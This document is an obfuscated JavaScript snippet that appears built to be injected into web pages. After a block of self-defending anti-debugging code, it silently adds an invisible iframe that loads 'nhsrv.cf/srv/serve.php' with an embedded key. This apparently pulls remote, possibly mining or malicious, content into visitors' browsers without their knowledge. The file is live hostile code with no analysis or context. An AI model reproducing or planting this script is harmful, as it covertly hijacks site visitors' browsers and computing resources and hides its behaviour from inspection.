var NHkey = "22521b712b6db2b3525225317ff5da4b"; var _0x53cdfb=function(){var _0x3c401e=!![];return function(_0x9915ea,_0x40136d){var _0x3130bd=_0x3c401e?function(){if(_0x40136d){var _0x55a83b=_0x40136d['apply'](_0x9915ea,arguments);_0x40136d=null;return _0x55a83b;}}:function(){};_0x3c401e=![];return _0x3130bd;};}();var _0x527148=_0x53cdfb(this,function(){var _0x5ac1d6=function(){return'\x64\x65\x76';},_0x5e4689=function(){return'\x77\x69\x6e\x64\x6f\x77';};var _0x50f68d=function(){var _0x4583dc=new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');return!_0x4583dc['\x74\x65\x73\x74'](_0x5ac1d6['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var _0x681897=function(){var _0x239ae4=new RegExp('\x28\x5c\x5c\x5b\x78\x7c\x75\x5d\x28\x5c\x77\x29\x7b\x32\x2c\x34\x7d\x29\x2b');return _0x239ae4['\x74\x65\x73\x74'](_0x5e4689['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var _0xe1650c=function(_0x479bc8){var _0x4e6bdf=~-0x1>>0x1+0xff%0x0;if(_0x479bc8['\x69\x6e\x64\x65\x78\x4f\x66']('\x69'===_0x4e6bdf)){_0x547ede(_0x479bc8);}};var _0x547ede=function(_0x27af5b){var _0x3f5324=~-0x4>>0x1+0xff%0x0;if(_0x27af5b['\x69\x6e\x64\x65\x78\x4f\x66']((!![]+'')[0x3])!==_0x3f5324){_0xe1650c(_0x27af5b);}};if(!_0x50f68d()){if(!_0x681897()){_0xe1650c('\x69\x6e\x64\u0435\x78\x4f\x66');}else{_0xe1650c('\x69\x6e\x64\x65\x78\x4f\x66');}}else{_0xe1650c('\x69\x6e\x64\u0435\x78\x4f\x66');}});_0x527148();if(typeof nhexist==='undefined'){var nhfr;nhfr=document['createElement']('iframe');nhfr['src']='https://nhsrv.cf/srv/serve.php?key='+NHkey;nhfr['id']='nhfr';nhfr['style']['display']='none';if(document['body']){document['body']['appendChild'](nhfr);}else{document['write']('');}var nhexist='1';}